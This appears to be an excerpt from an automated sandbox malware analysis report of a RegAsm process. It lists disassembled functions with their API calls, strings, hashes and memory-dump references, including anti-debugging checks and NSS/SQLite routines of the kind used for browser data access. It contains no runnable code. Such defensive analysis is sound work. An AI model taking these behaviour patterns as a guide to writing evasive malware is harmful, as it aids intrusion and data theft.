Opcode ID: 023536c78af8a8837f1666751cbc85440ee09e0d2f3ddc0cf519a4717c1ad981
Instruction ID: c53bb7f01de05bc546992361d96e3f7d333bf0d8dffd428b5f328a5fe32fbf83
Opcode Fuzzy Hash: 023536c78af8a8837f1666751cbc85440ee09e0d2f3ddc0cf519a4717c1ad981
Instruction Fuzzy Hash: A911A5B2D007049BD720CF659C815A7B7F8FF59258B144B2EE89D52A00F371B5988790

Function 0041CF6E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D3A6
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D3BB
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D3C6
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D3E2
TerminateProcess.KERNEL32(00000000), ref: 0041D3E9

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a4f47ef27b6a6f7b4c5d482268329d53f4b23b4a259e6d6a2b35a222d23f7cf6
Instruction ID: 0257efe45f1b759ce2ff9b77bbf5eef4bebdc3633833c830464a1efce5bc6f8c
Opcode Fuzzy Hash: a4f47ef27b6a6f7b4c5d482268329d53f4b23b4a259e6d6a2b35a222d23f7cf6
Instruction Fuzzy Hash: C721ADB4800304DFD701DF69F986A483BB4BB08716F10917AE519973A2EBB5A981CF5D

Function 6C26CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C26D086
PR_Malloc.NSS3(00000001), ref: 6C26D0B9
PR_Free.NSS3(?), ref: 6C26D138

Strings

>, xrefs: 6C26CF5B

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 55a99c67b91e41e3d919b866fb5de3d19535633a3b54d9b1a5b1d5f9af61803d
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: A0D15862B5164F0BEF14587F88A03EA77938782374F780365ED618BFE5E65988C38361

Function 6C0EAC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C0EAE9F
p&l, xrefs: 6C0EADA7
0&l, xrefs: 6C0EACC0, 6C0EAD22, 6C0EAD5E, 6C0EAE45
P&l, xrefs: 6C0EADDB, 6C0EADF5, 6C0EAE6A
winUnlock, xrefs: 6C0EAE18

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID: 0&l$P&l$p&l$winUnlock$winUnlockReadLock
API String ID: 0-857085598
Opcode ID: b242122d8cc5263862a92a78e8d57c525d5b3df7a1558517ce55b53030c25414
Instruction ID: 57b76e718f94cdbaeac4da62f161a7e6c4fd97ed8f8e8242aa4dd45ba596d288
Opcode Fuzzy Hash: b242122d8cc5263862a92a78e8d57c525d5b3df7a1558517ce55b53030c25414
Instruction Fuzzy Hash: 31717E716082449FDB04CF28E894AAABBF5FF8D314F14CA18ED5997351D730A986CBD1

Function 6C20AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c1fb7d13173f35cab38c394835a260055f8e4406d9659d0fa8934daf749c18
Instruction ID: d5c4096a15e0670b630d3dd4b51afedb39efa33e32a1ee8cb74bdb8e23266210
Opcode Fuzzy Hash: e9c1fb7d13173f35cab38c394835a260055f8e4406d9659d0fa8934daf749c18
Instruction Fuzzy Hash: 66F1F471F0112A8FDB14CFA9D8587AE77F0AB4A309F15422ADD05E7784EB749992CBC0

Function 6C1E25B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6C1C5A85), ref: 6C1E2675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C1E2659

Part of subcall function 6C193850: TlsGetValue.KERNEL32 ref: 6C19389F
Part of subcall function 6C193850: EnterCriticalSection.KERNEL32(?), ref: 6C1938B3
Part of subcall function 6C193850: PR_Unlock.NSS3(?), ref: 6C1938F1
Part of subcall function 6C193850: TlsGetValue.KERNEL32 ref: 6C19390F
Part of subcall function 6C193850: EnterCriticalSection.KERNEL32(?), ref: 6C193923
Part of subcall function 6C193850: PR_Unlock.NSS3(?), ref: 6C193972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1E2697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6C1C5A85,?,6C1C5A85), ref: 6C1E2717

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: 6330229f106ada30242395e44683fe440632651fbe0e29a282633105440cb57a
Instruction ID: f9c7797ea826f8651b9c2660f25e829f2b895fd56356465a8a86929a5711f32f
Opcode Fuzzy Hash: 6330229f106ada30242395e44683fe440632651fbe0e29a282633105440cb57a
Instruction Fuzzy Hash: 2C412871B087826AFB258F19CCA5FDB73A8DFEC714F204208ED5486681EA71958686D2

Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,?,?,?,?,00412805,?,?,00000000), ref: 00411E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,00412805,?,?,00000000), ref: 00411E8A
HeapAlloc.KERNEL32(00000000,?,?,?,00412805,?,?,00000000), ref: 00411E91

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 7bf52019d3b16b24b8fcd8524ef5d4f9c3745d72b832fa8cc929d7ca789d2f3c
Instruction ID: 689e8e5d0bc1fe0e07c6cc3a011b692955f75847b15c51aaa3f165aa6d2bea83
Opcode Fuzzy Hash: 7bf52019d3b16b24b8fcd8524ef5d4f9c3745d72b832fa8cc929d7ca789d2f3c
Instruction Fuzzy Hash: 81015E70500309FFDF118FA1DC449EB7BBAFF493A1B204519F90583260D7359991EB20

Function 6C138540 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 782COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000011C,automatic index on %s(%s),?,00000001), ref: 6C138705

Strings

automatic index on %s(%s), xrefs: 6C1386FB
BINARY, xrefs: 6C138B02, 6C138DA2, 6C138E27, 6C138E60

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: BINARY$automatic index on %s(%s)
API String ID: 632333372-611788421
Opcode ID: 14b52d4c343cedbaa66369064f43a453c2581a8dd6e3f5ed2ca53bcdbc6c6f36
Instruction ID: a6e3195cb1c340d64ee2c63668ecde62ab05fb1296295f1960d37c826259613a
Opcode Fuzzy Hash: 14b52d4c343cedbaa66369064f43a453c2581a8dd6e3f5ed2ca53bcdbc6c6f36
Instruction Fuzzy Hash: 6D62AE75A083519FE705CF28C480B1AB7F1BFD9348F149A5EE889AB751D731E846CB82

Function 6C0E4DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C0E5125
p&l, xrefs: 6C0E4E1C, 6C0E4E81, 6C0E4FDE, 6C0E5047, 6C0E50BB, 6C0E51A3, 6C0E526C
0&l, xrefs: 6C0E4EDE, 6C0E4F82
P&l, xrefs: 6C0E5019, 6C0E50FA, 6C0E5157, 6C0E51DE, 6C0E51F2, 6C0E520D, 6C0E5220, 6C0E52A2, 6C0E52B5

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID: 0&l$P&l$p&l$winUnlockReadLock
API String ID: 0-4110039781
Opcode ID: c4fb92c38dbb540183fd3eb5f888f41ed4c1117fea951402b35a880e043d96f5
Instruction ID: e2574d00ceb28c221b05fdbf59f6bd5942e6a562ccbf552bc4a52ada9555ceee
Opcode Fuzzy Hash: c4fb92c38dbb540183fd3eb5f888f41ed4c1117fea951402b35a880e043d96f5
Instruction Fuzzy Hash: A0E12C70A093449FDB04DF68D49875ABBF0BF89708F158A1DEC9997391E730A985CF82

Function 6C1264D0 Relevance: 3.2, Strings: 2, Instructions: 724COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C126D47, 6C126D4C
authorizer malfunction, xrefs: 6C126E3E

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID: authorizer malfunction$not authorized
API String ID: 0-2411240822
Opcode ID: 1650c1394abc40b09ebe86654f1b871dda6cd68bf82446bec79b35acbdb37949
Instruction ID: 04583ad26b85a7fbe66509d755fb0e418852cb89d02b00f617c101735717c327
Opcode Fuzzy Hash: 1650c1394abc40b09ebe86654f1b871dda6cd68bf82446bec79b35acbdb37949
Instruction Fuzzy Hash: BE627074A04208CFDB14CF19C484B697BF2FF89308F1581ADD9159B7A6D73AE956CB80

Function 0041C042 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,74DE83C0,00000000,?,?,?,?,?,?,?,?,0041C4FD,?), ref: 0041C097
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C4FD,?), ref: 0041C0A5

Part of subcall function 0041B883: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C16A,?,?,?,?,?,?,?,?,?,?,0041C50D), ref: 0041B89B

Part of subcall function 0041B85F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B87C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: bff2ec89fc596821ea73cd3c8ee77dfc2296f24b811945524ed281951fba7ee6
Instruction ID: 0252c434c898ddbf3762f327ec2b1cf303983f2bef804d4da5659dd9e6e4f8c6
Opcode Fuzzy Hash: bff2ec89fc596821ea73cd3c8ee77dfc2296f24b811945524ed281951fba7ee6
Instruction Fuzzy Hash: 4121E671900219CFCF44DFA9D8806ED7BF5FB08300F1480BAE849EA216E7358985DB65

Function 0040145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0040146D
NtQueryInformationProcess.NTDLL(00000000), ref: 00401474

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: f982676b5f6e6230e74547819debd7fd9ca53f04b00614762a39ebdf1de8a906
Instruction ID: e497434ff56417af3161791140d9890fc3d437e3a245e2705cbd7ba35a656c54
Opcode Fuzzy Hash: f982676b5f6e6230e74547819debd7fd9ca53f04b00614762a39ebdf1de8a906
Instruction Fuzzy Hash: 7EE01271640304F7EB109BA0DC06F5F72AC9700749F241165A606E50E0DAB8DA00DA69

Function 6C146410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6C146401,?,?,0000001C), ref: 6C146422
WSAGetLastError.WSOCK32(?,?,?,?,6C146401,?,?,0000001C), ref: 6C146432

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: c68c77e8a1995ea03b102d7b2096d463491bb1d144394905afaf7ed35fcaf3ed
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 8DE0E63525010C6F8F019F799C4485A37959F1822C755C560F919C7EA1E635D8D59750

Function 6C1AED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C1AEE3D

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 5b1e5770c1f53a5cc724c06bc0dcf229bdb9441a244571bada3ff55df2eb3b25
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: DA71E2B6E017018FDB18CF99C88076AB7F2EF98304F15466DD85A97B91D734EA12CB90

Function 0042B4B6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002B121,00000001), ref: 0042B4CF

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: cf3c0508420d8b59ba655ad005f8e3ad5e4e4f5288d9a501603e3edd28990dec
Instruction ID: d086a81d6916bfcfd1bcd3509207d1773b81b691d0d5dd359dc4f4070bd0e280
Opcode Fuzzy Hash: cf3c0508420d8b59ba655ad005f8e3ad5e4e4f5288d9a501603e3edd28990dec
Instruction Fuzzy Hash: 1AD05E71A107105BDB204F30ED497B177A0EB10B26F70A94ADD92850C1D7B865958644

Function 0042758E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002754C), ref: 00427593

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9afe5ddb764c172d6cd8fb57ba3debce1b900baaada4a657804f15003e14b0c2
Instruction ID: 62cb66b9b6599e580ffdb24c32a462ef0b7d2c3e368efaecd1e7ce42563e2799
Opcode Fuzzy Hash: 9afe5ddb764c172d6cd8fb57ba3debce1b900baaada4a657804f15003e14b0c2
Instruction Fuzzy Hash: 899002A039E260568A011B706C2E50565906A88706B952561A001C4454DB9540405929

Function 0042CC8E Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
